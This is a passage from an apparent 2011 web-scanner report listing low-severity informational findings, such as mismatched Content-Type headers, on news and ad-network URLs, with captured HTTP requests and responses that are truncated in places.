Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
24.30. http://www.nme.com/hotspot/channel/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /hotspot/channel/news

Request

GET /hotspot/channel/news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:04:08 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 17e868748e3a14e95d31caaebea7641546c76221"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 23|[{"Type":"LOG"},"cs: "]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3580"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 3145728"]|
X-Wf-1-1-1-9: 40|[{"Type":"LOG"},"ts: 0.030310153961182"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Length: 832
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:04:08 GMT
Date: Mon, 09 May 2011 14:04:08 GMT
Connection: close
Vary: Accept-Encoding

<div class="ad_1">
<iframe id="hotspot_1" src="/adcode/hot-spot.html?spot=1&channel=news" width="176" height="185" frameborder="0" scrolling="no"></iframe>
</div>
<div class="ad_2">
<iframe id="ho
...[SNIP]...
24.31. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...
24.32. http://www.sufjan.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sufjan.com
Path:   /

Request

GET / HTTP/1.1
Host: www.sufjan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
Last-Modified: Tue, 10 Mar 2009 23:58:35 GMT
ETag: "23ac809a-41c-464cc876cc0c0"
Accept-Ranges: bytes
Content-Length: 1052
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sufjan Stevens</title>
<link href="/css/basicmap.css" rel="stylesheet" type="text/css">
<META
content="Sufjan Stev
...[SNIP]...
24.33. http://www.surphace.com/ads/rubicon_orlandosentinel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surphace.com
Path:   /ads/rubicon_orlandosentinel

Request

GET /ads/rubicon_orlandosentinel HTTP/1.1
Host: www.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Location: rubicon_orlandosentinel.html
TCN: choice
Last-Modified: Mon, 07 Mar 2011 17:01:49 GMT
X-Machine: web9
Content-Type: text/html
x-forwarded-for: 24.236.115.157
Content-Length: 1282
Date: Mon, 09 May 2011 13:59:59 GMT
X-Varnish: 730030160 685198647
Age: 569244
Via: 1.1 varnish
Connection: keep-alive

<html><head></head><body>
<script type='text/javascript'><!--//<![CDATA[
var m3_u = (location.protocol=='https:'?'https://d.tradex.openx.com/ajs.php':'http://d.tradex.openx.com/ajs.php');
var m3
...[SNIP]...
25. Content type incorrectly stated  previous  next
There are 24 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;~cs=f
Date: Mon, 09 May 2011 14:00:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1183

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;237762067;0-0;0;60840454;24/24;41882989/41900776/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...
25.2. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
25.3. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1304949596809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:57 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");
25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
25.5. http://cdn.apture.com/media/searchfilter.khtml.v30596971.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.apture.com
Path:   /media/searchfilter.khtml.v30596971.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /media/searchfilter.khtml.v30596971.js HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=30596971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:13 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 00:19:44 GMT
Age: 221969
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 4080
Last-Modified: Sat, 07 May 2011 00:12:37 GMT
Connection: keep-alive
Content-Length: 4080

apture.fileCache.load("searchfilter", "if(window.apture.rt)window.apture.rt.Et=/\\b(be~?an~?er|qu~?ee~?f|mo~?th~?er~?fu~?ck~?s|ej~?ac~?ul~?at~?ed|cu~?nt~?li~?ck~?er|as~?sh~?ol~?es|mi~?lf|pe~?ni~?s|pi~
...[SNIP]...
25.6. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.simpleshare.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.simpleshare.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 01 May 2011 07:04:34 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Mon, 09 May 2011 13:59:46 GMT
Connection: close
Content-Length: 21429

gigya.global._GetElementPos=function(obj){var curleft=curtop=0;if(obj.offsetParent){do{curleft+=obj.offsetLeft;curtop+=obj.offsetTop;}while(obj=obj.offsetParent);}return{left:curleft,top:curtop};};gig
...[SNIP]...
25.7. http://content.pulse360.com/cgi-bin/context.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
